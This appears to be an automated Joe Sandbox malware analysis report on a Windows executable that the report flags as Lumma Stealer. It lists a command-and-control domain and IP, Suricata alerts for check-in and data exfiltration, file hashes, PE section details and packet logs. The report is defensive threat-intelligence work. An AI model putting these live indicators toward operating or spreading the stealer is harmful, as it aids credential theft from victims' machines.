                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://necklacedmny.store/apixfile.exe, 00000000.00000003.2341515755.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351913057.00000000014A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341482774.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2349342811.00000000014A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://necklacedmny.store/api7Ufile.exe, 00000000.00000003.1897569815.00000000014E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1897711414.00000000014E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://crl.microXfile.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340779030.00000000014C6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340350383.00000000014C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/pfile.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://necklacedmny.store/kfile.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://necklacedmny.store/file.exe, 00000000.00000003.1950914872.00000000014D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://necklacedmny.store:443/apilfile.exe, 00000000.00000003.2348526012.000000000145F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://x1.c.lencr.org/0file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1879030685.0000000005D6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://necklacedmny.store/apis9file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://necklacedmny.store/Cfile.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1880747839.0000000005F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1385163124.0000000005CA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://necklacedmny.store:443/apifile.exe, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://necklacedmny.store/Kfile.exe, 00000000.00000003.1384736970.00000000014D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000000.00000003.1894747831.0000000005C7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895063394.0000000005C7F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://necklacedmny.store/qPfile.exe, 00000000.00000003.1862847814.0000000001487000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                188.114.96.3
                                                                                		necklacedmny.storeEuropean Union
                                                                                		13335CLOUDFLARENETUStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1544564
                                                                                Start date and time:2024-10-29 15:26:07 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 6m 2s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:7
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:file.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                                EGA Information:Failed
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target file.exe, PID 7636 because there are no executed function
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: file.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                10:27:13API Interceptor1804514x Sleep call for process: file.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                188.114.96.3zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                • touxzw.ir/alpha2/five/fre.php
                                                                                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • filetransfer.io/data-package/jI82Ms6K/download
                                                                                9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                                DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                                • www.globaltrend.xyz/b2h2/
                                                                                transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                • paste.ee/d/Gitmx
                                                                                19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                                • www.zonguldakescortg.xyz/483l/
                                                                                PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                • www.rtpngk.xyz/876i/
                                                                                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                • www.fnsds.org/

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                necklacedmny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.97.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                • 188.114.97.3

                                                                                ASNs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSNew Portable Document.pdfGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                2DpxPyeiUv.exeGet hashmaliciousStealc, VidarBrowse
                                                                                • 172.64.41.3
                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                • 172.67.75.163
                                                                                installer.exeGet hashmaliciousUnknownBrowse
                                                                                • 104.26.8.59
                                                                                https://trainingndt.com/Get hashmaliciousUnknownBrowse
                                                                                • 104.22.72.81
                                                                                Oakville_Service_Update_d76b33a1-3420-40be-babd-e82e253ad25c.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14
                                                                                z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                • 188.114.96.3
                                                                                zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                                • 188.114.97.9
                                                                                CARDFACTORYAccess Program, Tuesday, October 29, 2024.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.18.95.41
                                                                                http://url5148.librariapena.com/ls/click?upn=u001.GicqFEndYG5aFpuN1ngPufTfXrsQ9xNlNirpytR4MM9aBsYYFODsiAPftWqmKpvrE6ff_B2fWkfszhSflnL0HA3FnQqEKk1HJkizy-2Fud2LEQeI5aha2K2G6ppF2O0bL7D7H7LMN8WGu5xRF2M8uaTM6MXf6DAMaADWmIUL1YqZWKrQh1g-2F0n0cxV2mRrNZEteUwfW5DOdClcZ0c7E-2FIhACBFYnzvVFSnfSt3CZCN7P1EL1QyPVm42KBQGCDp3btvtG-2BbRJha-2FOyJXx-2BDZbno3l2jsvw-2FwkacYeoKE0uINsamNbg0rV0A52QCvn7k6VYTShXjbi9u51Z787-2F01bX1DTA9aSBSP-2FWMLEspaU-2FIdc1x-2FmRDSh7t6BQtQAtVlDsdci-2FkdE5XEzXcy1T7RT1mRx0Z8c0C7T5TxNvH7MOJLp-2BPx4LTMm4cKm4w-2Br4av4rqX3sFI-2B0Z54CPJjpfmgkQpOwbMxDkpsmVoLcKhd8rV7DcMtFguJaotRS3nEWM4vOO-2FegVGhzrwPBH6NjA2esFflr-2FYmA56ZztqyuVYNkq6vFbZhu3qpImgcxi-2BBybDKRWWCy9ZJhz5kW6d7c5iFMdA14shvBlO5oteNsOg1T8Wcd4MIJllivR5RQLa6JKyKUfgK8kF9DoOU4JGzocfITKQs9Z05ET92-2FS1aC5wu-2FuyffXQ4VOTrXPB9d3zUlvAaEdOc87CGa5e4y4lu-2F-2B9njpJqjlihSLoXPx3uHJhhT5l60Eu-2Fd0OnNMVN2uGoOn8P4Kyfxcr-2B3atbrIS84kkAo7VV7ElDHFn2Wn-2B0iZqwoFL1t1YCz2cR3xAkH3Dm45o7ag9bF7tv0L4g2t8v1fAwuiPylHAHkqFOEcwcDndKNNLE7ObrCi0wDxBijc-2FYVZU6-2F0yIfBAmiocABK2NEl2-2F-2FPMERnDYg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                • 104.17.25.14

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1buNtKcYHCa.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3
                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                • 188.114.96.3

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                No created / dropped files found

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):6.608120174146751
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:file.exe
                                                                                File size:2'964'992 bytes
                                                                                MD5:e8febbee7f62ca4c85f34bccb279eb67
                                                                                SHA1:610b9007b886130f73e723daf0fc8222ee66a396
                                                                                SHA256:7b054538e0120d88a52303efa5128a62c629ded45f5fafeadf93b9f284d1a70a
                                                                                SHA512:45057443f147c41e1453c8c541b15d0fa7d0515f947138952555ef0d146df1eec79dab71c948990c243ca200bec3a2167b6e5b123914a3f872d3a7cf66237a23
                                                                                SSDEEP:49152:PGPwcdKmXAMVjTMBCH2fd7MxuCvYBXJI9lNTqfV7L:ePLdKmXAMVjIBTS38aNTqfV7L
                                                                                TLSH:DCD54A92A48CB1CFD48E27749327CD87585C03B94F285DD7A92CA8B97E67CC513B6C28
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P0...........@...........................0......:....@.................................T...h..

                                                                                File Icon

                                                                                Icon Hash:00928e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x705000
                                                                                Entrypoint Section:.taggant
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp 00007EFFACEF260Ah
                                                                                hint_nop dword ptr [00000000h]
                                                                                add cl, ch
                                                                                add byte ptr [eax], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [esi], al
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], dh
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+eax], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                and dword ptr [eax], eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [eax+00000000h], eax
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add eax, 0000000Ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], dh
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [edx], ah
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [edx], ecx
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                inc eax
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add dword ptr [eax], eax
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [ecx], al
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                adc byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                pop es
                                                                                or al, byte ptr [eax]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+0Ah], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                pop es
                                                                                add byte ptr [eax], 00000000h
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                0x10000x580000x27e001e2b1907ad46eb6cf40f35095834c7d1False0.9978448275862069data7.971219963000856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                pbzdrecb0x5b0000x2a90000x2a88006aad7a4544876ba0c2afe07223402923unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                nwxoinbz0x3040000x10000x4000fb46c4c848c47e6fc23554bc319b8b1False0.7666015625data6.024108858331269IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .taggant0x3050000x30000x22005af1757f8b653181b2f1dc3b3a786cf9False0.04997702205882353DOS executable (COM)0.5289179869085167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                Imports

                                                                                DLLImport
                                                                                kernel32.dlllstrcpy

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-10-29T15:27:15.847011+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749704188.114.96.3443TCP
                                                                                2024-10-29T15:27:15.847011+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749704188.114.96.3443TCP
                                                                                2024-10-29T15:27:18.068779+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749715188.114.96.3443TCP
                                                                                2024-10-29T15:27:18.068779+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749715188.114.96.3443TCP
                                                                                2024-10-29T15:28:14.202045+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749979188.114.96.3443TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 29, 2024 15:27:14.651366949 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:14.651386976 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:14.651472092 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:14.675579071 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:14.675590992 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.312716961 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.312860966 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.316411972 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.316416025 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.316638947 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.357465029 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.371357918 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.371390104 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.371448994 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.847007990 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.847208977 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.847300053 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.849349022 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.849358082 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.849379063 CET49704443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.849385023 CET44349704188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.900707960 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.900721073 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:15.900794029 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.901086092 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:15.901092052 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:16.591727018 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:16.591797113 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:16.593626976 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:16.593632936 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:16.593852043 CET44349715188.114.96.3192.168.2.7
                                                                                Oct 29, 2024 15:27:16.595138073 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:16.595161915 CET49715443192.168.2.7188.114.96.3
                                                                                Oct 29, 2024 15:27:16.595201015 CET44349715188.114.96.3192.168.2.7
